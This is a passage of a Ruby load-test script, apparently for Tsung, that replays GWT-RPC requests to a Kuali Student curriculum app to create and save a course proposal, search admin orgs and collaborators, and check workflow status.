0|1|8|22|14|111|-356|-358|-350|-354|-346|-348|-1|-344|8|112|17|5|6|7|0|0|-1|-364|8|113|14|114|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487341491|1309965025280|771000000|8|40|14|59|8|41|38|39|3487349901|1309965025280|181000000|8|42|14|115|-1|-370|8|116|10|-5|8|117|17|5|6|7|0|0|-1|-388|8|118|10|-5|8|46|14|61|8|119|14|120|8|102|17|5|6|7|0|2|18|-15|14|121|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|122|-406|-408|-400|-404|-1|-398|8|123|14|124|8|48|14|125|8|99|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-426|-428|-420|-424|-1|-418|8|128|17|5|6|7|0|2|18|-15|14|129|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|130|-442|-444|-436|-440|-1|-434|8|131|17|5|6|7|0|0|-1|-450|8|132|17|5|6|7|0|3|8|133|38|39|3487341491|1309965025280|771000000|8|134|135|136|1|0|8|137|14|138|-1|-454|8|21|17|5|6|7|0|3|8|119|17|5|6|7|0|1|8|22|14|120|-468|-470|8|13|17|5|6|7|0|1|8|22|14|139|-468|-476|8|140|17|5|6|7|0|2|8|141|10|11|1|8|142|10|-488|-468|-482|-1|-466|8|143|17|5|6|7|0|12|8|144|14|145|8|30|14|146|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487341710|1309965025280|990000000|8|40|14|59|8|41|38|39|3487350824|1309965025280|104000000|8|42|14|90|-493|-499|8|44|14|64|8|147|17|5|6|7|0|1|18|-15|14|107|-493|-517|8|148|14|149|8|150|17|5|6|7|0|0|-493|-525|8|151|17|5|6|7|0|0|-493|-529|8|152|14|153|8|46|14|154|8|48|14|155|8|156|14|157|-1|-491|8|158|17|5|6|7|0|1|8|159|17|5|6|7|0|0|-543|-545|-1|-541|-486|14|160|-489|14|0|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Financials\n # $100 lab fee\n # Admin org 100% rev and exp\n #\n\n @request.add_thinktime(5)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.feeType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n\n # Revenue - Admin Org\n for i in 1..admin_org.length\n itr = i-1\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n } \n ) \n end\n\n @request.add_thinktime(5)\n\n # Expense - Admin Org\n for i in 1..admin_org.length\n if(i == admin_org.length)\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:admin_dep_var_name], \"regexp\" => opts[:admin_dep_var_regexp]}\n ]\n } \n )\n else\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n } \n )\n end \n end\n\n #@request.add(\"DEBUG/admin_dep_var_name/%%_#{opts[:admin_dep_var_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(20)\n\n # Save & Continue\n contents1 = \"5|0|172|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|1|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|dirty|orgId|percentage|created|%%_#{opts[:admin_dep_var_name]}%%|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|fees|feeType|rateType|kuali.enum.type.feeTypes.labFee|fixedRateFee|feeAmounts|currencyQuantity|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|2|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|4|pilotCourse|revenues|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|6|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488193507|1309965025280|787000000|8|40|14|59|8|41|38|39|3488196257|1309965025280|537000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|21|17|5|6|7|0|3|8|85|17|5|6|7|0|2|8|86|10|11|1|8|87|10|-221|-213|-215|8|88|10|-221|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-224|10|-221|-227|-215|-213|-211|-209|-211|-219|14|89|-222|90|91|100|0|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|-211|17|5|6|7|0|3|-215|17|5|6|7|0|2|8|93|10|-221|8|94|10|-221|-245|-215|8|88|10|-221|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-254|10|-221|-257|-215|-245|-211|-242|-211|-250|14|95|-252|14|96|8|97|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|98|80|19|100|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-273|10|-221|-277|-215|-271|-211|-267|-269|-242|-265|-238|-240|-1|-236|8|99|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|100|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|101|14|102|8|103|17|5|6|7|0|3|8|104|14|105|8|106|14|107|8|21|17|5|6|7|0|1|8|106|17|5|6|7|0|1|8|22|14|108|-311|-313|-303|-309|-297|-301|8|109|80|-275|8|76|17|5|6|7|0|3|8|77|14|110|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0\"\n contents3 = \"|1|8|22|14|111|-332|-334|-323|-330|-297|-321|8|30|14|112|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488189822|1309965025280|102000000|8|40|14|59|8|41|38|39|3488196198|1309965025280|478000000|8|42|14|113|-297|-342|8|46|14|62|8|114|17|5|6|7|0|0|-297|-360|8|21|17|5|6|7|0|1|8|101|17|5|6|7|0|1|8|22|14|115|-366|-368|-297|-364|-293|-295|-289|-291|8|30|14|116|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488189788|1309965025280|68000000|8|40|14|59|8|41|38|39|3488196188|1309965025280|468000000|8|42|14|113|-289|-376|8|46|14|62|8|117|17|5|6|7|0|0|-289|-394|8|48|14|118|-285|-287|-1|-283|8|119|17|5|6|7|0|2|18|-15|14|120|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|121|-408|-410|-402|-406|-1|-400|8|30|14|122|8|123|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|124|14|125|8|21|17|5|6|7|0|1|8|124|17|5|6|7|0|1|8|22|14|126|-430|-432|-424|-428|-420|-422|-1|-418|8|127|17|5|6|7|0|0|-1|-438|8|128|14|129|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488185173|1309965025280|453000000|8|40|14|59|8|41|38|39|3488196156|1309965025280|436000000|8|42|14|130|-1|-444|8|131|10|-5|8|132|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|-211|17|5|6|7|0|1|-215|17|5|6|7|0|2|8|86|10|-221|8|87|10|-221|-479|-215|-476|-211|-484|14|89|-486|90|-235|-472|-474|-468|-470|8|21|17|5|6|7|0|2|8|88|10|-221|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-494|10|-221|-497|-215|-492|-211|-468|-490|-464|-466|-1|-462|8|133|10|-5|8|134|14|135|8|46|14|62|8|136|14|137|8|117|17|5|6|7|0|2|18|-15|14|138|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|139|-519|-521|-513|-517|-1|-511|8|140|14|141|8|48|14|142|8|114|17|5|6|7|0|2|18|-15|14|143|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|144|-539|-541|-533|-537|-1|-531|8|145|17|5|6|7|0|2|18|-15|14|89|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|146|-555|-557|-549|-553|-1|-547|8|147|17|5|6|7|0|0|-1|-563|8|148|17|5|6|7|0|3|8|149|38|39|3488185173|1309965025280|453000000|8|150|90|91|1|0|8|151|14|152|-1|-567|8|21|17|5|6|7|0|3|8|134|17|5|6|7|0|1|8|22|14|153|-581|-583|8|136|17|5|6|7|0|1|8|22|14|137|-581|-589|8|13|17|5|6|7|0|1|8|22|14|154|-581|-595|-1|-579|8|155|17|5|6|7|0|12|8|156|14|157|8|30|14|158|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488185428|1309965025280|708000000|8|40|14|59|8|41|38|39|3488197141|1309965025280|421000000|8|42|14|159|-603|-609|8|44|14|65|8|160|17|5|6|7|0|1|18|-15|14|122|-603|-627|8|161|14|162|8|163|17|5|6|7|0|0|-603|-635|8|164|17|5|6|7|0|0|-603|-639|8|165|14|166|8|46|14|167|8|48|14|168|8|169|14|170|-1|-601|8|171|17|5|6|7|0|1|8|172|17|5|6|7|0|0|-653|-655|-1|-651|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}#{contents3}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:affliated_orgs_id_name], \"regexp\" => opts[:affliated_orgs_id_regexp]},\n {\"name\" => opts[:lab_fee_id_name], \"regexp\" => opts[:lab_fee_id_regexp]},\n {\"name\" => opts[:revenues_id_name], \"regexp\" => opts[:revenues_id_regexp]},\n {\"name\" => opts[:revenue_id_name], \"regexp\" => opts[:revenue_id_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/affliated_orgs_id_name/%%_#{opts[:affliated_orgs_id_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/lab_fee_id_name/%%_#{opts[:lab_fee_id_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/revenues_id_name/%%_#{opts[:revenues_id_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/revenue_id_name/%%_#{opts[:revenue_id_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(2)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|isAuthorizedAddReviewer|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|isAuthorizedRemoveReviewers|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n \n #\n # Authors and Collaborators\n #\n\n @request.add_thinktime(5)\n\n if(!opts[:collaborator].nil?)\n # Collaborator seach\n for i in 1..opts[:collaborator].length\n itr = i-1\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|person.queryParam.personGivenName|#{opts[:collaborator][0..itr]}|person.queryParam.excludedUserId|psycho1|person.search.personQuickViewByGivenName|person.resultColumn.DisplayName|1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|0|12|13|14|0|0|\"\n } \n ) \n end\n\n @request.add_thinktime(5)\n\n\n contents1 = \"5|0|190|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|2|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|1|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|3|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|7|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|principalId|#{opts[:collaborator]}|permission|KS-SYS~Edit Document|action|F|firstName|lastName|actionRequestStatus|New|author\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489516951|1309965025280|231000000|8|40|14|59|8|41|38|39|3489523415|1309965025280|695000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489523331|1309965025280|611000000|8|40|14|59|8|41|38|39|3489523333|1309965025280|613000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325\"\n contents3 = \"|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489513388|1309965025280|668000000|8|40|14|59|8|41|38|39|3489523378|1309965025280|658000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489513379|1309965025280|659000000|8|40|14|59|8|41|38|39|3489523370|1309965025280|650000000|8|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489508904|1309965025280|184000000|8|40|14|59|8|41|38|39|3489523333|1309965025280|613000000|8|42|14|111|-1|-448|8|136|10|-5|8|137|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|138|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|139|8|30|14|140|8|34|17|5|6|7|0|5|8|35|14|59|8|3